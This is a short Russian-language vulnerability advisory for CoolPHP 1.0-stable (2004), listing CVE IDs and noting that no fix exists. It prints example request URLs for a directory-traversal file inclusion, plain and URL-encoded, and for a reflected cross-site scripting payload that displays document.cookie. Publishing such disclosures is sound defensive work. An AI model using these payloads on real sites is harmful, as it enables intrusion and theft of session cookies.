Дата публикации: | 18.10.2004 |
Всего просмотров: | 1128 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-1599 CVE-2004-1600 CVE-2004-1601 CVE-2006-2816 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Раскрытие системных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | CoolPHP 1.x |
Уязвимые версии: CoolPHP 1.0-stable
Описание:
1. Выполнение произвольного кода.
http://[victim]/index.php?op=../../../../anotheruser/evilfile http://[victim]/index.php?op=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fanotheruser/evilfile
2. Межсайтовое выполнение сценариев.
http://[victim]/index.php?op=buscar&query=<script language=javascript>window.alert(document.cookie);</script>
3. Раскрытие установочной директории. URL производителя: cphp.sourceforge.net/ Решение: Решение на данный момент не существует |
|
Ссылки: | CoolPHP Input Validation Holes Let Local Users Execute Arbitrary Commands and Remote Users Conduct Cross-Site Scripting Attacks |